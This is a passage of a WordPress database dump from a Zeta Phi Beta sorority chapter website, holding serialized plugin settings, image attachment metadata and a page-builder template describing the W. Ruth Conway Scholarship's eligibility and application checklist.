"0\";s:8:\"keywords\";a:0:{}}}'),(3216,786,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(3136,763,'_mc4wp_settings','a:8:{s:5:\"lists\";a:1:{i:0;s:10:\"6feb90d20b\";}s:15:\"required_fields\";s:5:\"EMAIL\";s:12:\"double_optin\";s:1:\"1\";s:15:\"update_existing\";s:1:\"1\";s:17:\"replace_interests\";s:1:\"1\";s:18:\"hide_after_success\";s:1:\"0\";s:8:\"redirect\";s:30:\"https://zphiblgz.org/contactus\";s:3:\"css\";s:1:\"0\";}'),(3137,764,'_mc4wp_settings','a:8:{s:15:\"required_fields\";s:5:\"EMAIL\";s:5:\"lists\";a:1:{i:0;s:10:\"6feb90d20b\";}s:12:\"double_optin\";s:1:\"1\";s:15:\"update_existing\";s:1:\"0\";s:17:\"replace_interests\";s:1:\"1\";s:18:\"hide_after_success\";s:1:\"0\";s:8:\"redirect\";s:0:\"\";s:3:\"css\";s:1:\"0\";}'),(3138,764,'text_subscribed','Thank you, your sign-up request was successful! Please check your email inbox to confirm.'),(3139,764,'text_invalid_email','Please provide a valid email address.'),(3140,764,'text_required_field_missing','Please fill in the required fields.'),(3141,764,'text_already_subscribed','Given email address is already subscribed, thank you!'),(3142,764,'text_error','Oops. Something went wrong. Please try again later.'),(3143,764,'text_unsubscribed','You were successfully unsubscribed.'),(3144,764,'text_not_subscribed','Given email address is not subscribed.'),(3145,764,'text_no_lists_selected','Please select at least one list.'),(3146,764,'text_updated','Thank you, your records have been updated!'),(3147,763,'text_subscribed','Thank you, your sign-up request was successful! Please check your email inbox to confirm.'),(3148,763,'text_invalid_email','Please provide a valid email address.'),(3149,763,'text_required_field_missing','Please fill in the required fields.'),(3150,763,'text_already_subscribed','Given email address is already subscribed, thank you!'),(3151,763,'text_error','Oops. Something went wrong. Please try again later.'),(3152,763,'text_unsubscribed','You were successfully unsubscribed.'),(3153,763,'text_not_subscribed','Given email address is not subscribed.'),(3154,763,'text_no_lists_selected','Please select at least one list.'),(3155,763,'text_updated','Thank you, your records have been updated!'),(3156,766,'_wp_attached_file','2016/12/rsz_zeta-phi-beta-seal.png'),(3157,766,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:34:\"2016/12/rsz_zeta-phi-beta-seal.png\";s:5:\"sizes\";a:1:{s:5:\"thumb\";a:4:{s:4:\"file\";s:34:\"rsz_zeta-phi-beta-seal-150x110.png\";s:5:\"width\";i:150;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3215,786,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(3218,786,'post_settings',NULL),(3226,797,'ts_use_template','1'),(3227,797,'_edit_lock','1632338661:1'),(3228,797,'_edit_last','1'),(3229,797,'ts_template','a:4:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:0:{}}i:1;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:80:\"https://zphiblgz.org/wp-content/uploads/2017/01/NonDistressedWRuthConwayLogo.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}}}i:2;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:0:{}}}}i:1;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:0:{}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:2:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:26:\"W. Ruth Conway Scholarship\";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:16:\"lineariconcenter\";s:4:\"size\";s:2:\"h2\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:0:{}}}}i:2;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:2:{i:0;a:2:{s:4:\"size\";i:9;s:8:\"elements\";a:6:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1290:\"<p>In 2005, <span style=--quote--color: #2741a6;--quote--><strong>Lambda Gamma Zeta</strong></span> renamed its annual scholarship the <span style=--quote--color: #2741a6;--quote--><em>W. Ruth Conway <a href=--quote--https://zphiblgz.org/scholarship/soror-conway1/--quote-- rel=--quote--attachment wp-att-1179--quote--><img class=--quote-- wp-image-1179 alignleft--quote-- src=--quote--https://zphiblgz.org/wp-content/uploads/2017/01/Soror-Conway1-300x300.png--quote-- alt=--quote----quote-- width=--quote--239--quote-- height=--quote--239--quote-- /></a>Scholarship</em></span> in honor of Soror W. Ruth Conway.  Soror Conway has been a member of Zeta Phi Beta Sorority, Inc. since 1948 with over 50 years of <em>uninterrupted</em> service to the organization and is one of the chapter\'s charter members.</p><p>The <strong><span style=--quote--color: #2741a6;--quote--><em>W. Ruth Conway Scholarship</em></span></strong> is awarded in the spring of each year to African American high school seniors in Howard County, Maryland who are planning to attend a four-year college or university upon graduation and to Women of Color attending Howard Community College.  Recipients of the scholarship exhibit a dedication to high scholastic aptitude, leadership, and community service. </p>\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:4;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:38:\"Application & Eligibility Requirements\";s:11:\"title-color\";s:7:\"#2041a5\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h3\";s:11:\"admin-label\";s:0:\"\";}i:5;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1307:\"<p>To apply for the W. Ruth Conway Scholarship all applicants must complete and submit the online application. Before submitting your application, please check that all attachments have uploaded appropriately and that all sections of the application are complete.  Incomplete applications will not be considered.  A helpful checklist is below:</p><ul><li>Demographic section completed (Email and phone numbers are correct)</li><li>Academic and community involvement section complete</li><li>Essay is uploaded</li><li>Transcript is uploaded</li><li>Photo</li><li><a href=--quote--https://zphiblgz.org/scholarship/lgzscholarshipreleaseform/--quote-->Photo Release Form </a>(<em>Click to Download</em>)</li></ul><h4><span style=--quote--color: #2041a5;--quote-->High School Applicants </span></h4><ul><li>African American graduating senior</li><li>Graduating from a Howard County, MD high school</li><li>Unweighted GPA of 3.0 or higher</li></ul><h4><span style=--quote--color: #2041a5;--quote-->Howard Community College Applicants </span></h4><ul><li><span style=--quote--color: #000000;--quote-->Woman of Color attending Howard Community College</span></li><li>Howard County, MD resident</li><li>Successfully completed 18 college credits</li><li>Unweighted GPA of 3.0 or higher</li></ul><p> </p><p> </p>\";s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:3:{i:0;a:6:{s:4:\"type\";s:10:\"count-down\";s:11:\"admin-label\";s:0:\"\";s:5:\"title\";s:35:\"W. Ruth Conway Scholarship Deadline\";s:4:\"date\";s:10:\"2019/03/29\";s:5:\"hours\";s:0:\"\";s:5:\"style\";s:5:\"small\";}i:1;a:4:{s:4:\"type\";s:9:\"delimiter\";s:14:\"delimiter-type\";s:4:\"line\";s:15:\"delimiter-color\";s:7:\"#2041a5\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:189:\"<p style=--quote--text-align: center;--quote-->If you have any questions about the W. Ruth Conway Scholarship or experience any technical difficulties, contact scholarships@zphiblgz.org</p>\";s:11:\"admin-label\";s:0:\"\";}}}}}i:3;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:1:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:23:\"Scholarship Recipients \";s:11:\"title-color\";s:7:\"#2041a5\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h3\";s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:5;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:80:\"https://zphiblgz.org/wp-content/uploads/2021/09/2021-scholarship-recipient-1.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}i:2;a:2:{s:4:\"size\";i:6;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:80:\"https://zphiblgz.org/wp-content/uploads/2021/09/2021-scholarship-recipient-2.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:4:\"left\";}}}}}}'),(4368,1147,'_wp_attached_file','2017/01/1000.png'),(4369,1147,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2017/01/1000.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"1000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:16:\"1000-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:16:\"1000-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"1000-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4194,1102,'_edit_lock','1502332851:1'),(4195,1102,'_edit_last','1'),(4196,1102,'ts_template','a:0:{}'),(4197,1102,'ts_article_views','0'),(3230,797,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(3231,797,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(3232,797,'page_settings','a:5:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:2:\"no\";}'),(3233,797,'post_settings',NULL),(3256,803,'_wp_attached_file','2014/12/rsz_marylandlogo.jpg'),(3257,803,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:28:\"2014/12/rsz_marylandlogo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"rsz_marylandlogo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"rsz_marylandlogo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:28:\"rsz_marylandlogo-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:28:\"rsz_marylandlogo-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"rsz_marylandlogo-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"rsz_marylandlogo-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"rsz_marylandlogo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5503,1431,'_thumbnail_id','1438'),(5506,1444,'_edit_last','1'),(5507,1444,'_rawhtml_settings','0,0,0,0'),(5508,1444,'event','a:13:{s:3:\"day\";s:0:\"\";s:10:\"start-time\";s:0:\"\";s:8:\"end-time\";s:0:\"\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:0:\"\";s:12:\"event-repeat\";s:1:\"1\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:0:\"\";s:3:\"map\";s:0:\"\";s:9:\"free-paid\";s:4:\"paid\";s:10:\"ticket-url\";s:0:\"\";s:5:\"price\";s:0:\"\";s:5:\"venue\";s:0:\"\";}'),(5509,1444,'day',''),(5510,1444,'_yoast_wpseo_content_score','30'),(5511,1444,'_yoast_wpseo_estimated-reading-time-minutes','1'),(5512,1444,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5501,1438,'_wp_attached_file','2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg'),(5482,1431,'_edit_last','1'),(5483,1432,'_wp_attached_file','2021/01/Above-the-Mask-flyer.png'),(5484,1432,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:1200;s:4:\"file\";s:32:\"2021/01/Above-the-Mask-flyer.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Above-the-Mask-flyer-200x300.png\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"Above-the-Mask-flyer-683x1024.png\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Above-the-Mask-flyer-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"Above-the-Mask-flyer-768x1152.png\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Above-the-Mask-flyer-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:32:\"Above-the-Mask-flyer-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:32:\"Above-the-Mask-flyer-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:32:\"Above-the-Mask-flyer-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3390,839,'_wp_attached_file','2017/01/Final2017HSApplication.docx'),(3391,840,'_wp_attached_file','2017/01/Final2017HCCCApplication.docx'),(5465,1418,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:32:\"Mic-Check-2-flyer-FINALfinal.png\";}}'),(3266,806,'_wp_attached_file','2017/01/students-at-graduation-ceremony_rYeLM4Rrs.jpg'),(3267,806,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3800;s:6:\"height\";i:2533;s:4:\"file\";s:53:\"2017/01/students-at-graduation-ceremony_rYeLM4Rrs.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:54:\"students-at-graduation-ceremony_rYeLM4Rrs-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:53:\"students-at-graduation-ceremony_rYeLM4Rrs-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:13:\"Shannon Fagan\";s:6:\"camera\";s:21:\"Canon EOS-1Ds Mark II\";s:7:\"caption\";s:31:\"Students at graduation ceremony\";s:17:\"created_timestamp\";s:10:\"1132564864\";s:9:\"copyright\";s:16:\"© Shannon Fagan\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:31:\"Students at graduation ceremony\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:18:{i:0;s:7:\"college\";i:1;s:10:\"university\";i:2;s:8:\"learning\";i:3;s:9:\"education\";i:4;s:10:\"graduation\";i:5;s:8:\"graduate\";i:6;s:7:\"student\";i:7;s:10:\"auditorium\";i:8;s:4:\"gown\";i:9;s:5:\"happy\";i:10;s:7:\"hopeful\";i:11;s:6:\"future\";i:12;s:10:\"friendship\";i:13;s:8:\"ceremony\";i:14;s:15:\"mixed ethnicity\";i:15;s:15:\"black ethnicity\";i:16;s:16:\"african american\";i:17;s:9:\"young man\";}}}'),(3268,807,'_wp_attached_file','2017/01/degree.jpg'),(3269,807,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2000;s:6:\"height\";i:1000;s:4:\"file\";s:18:\"2017/01/degree.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"degree-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"degree-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"degree-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"degree-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"degree-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:18:\"degree-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:18:\"degree-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:18:\"degree-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"degree-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"degree-300x300.jpg\";s:5: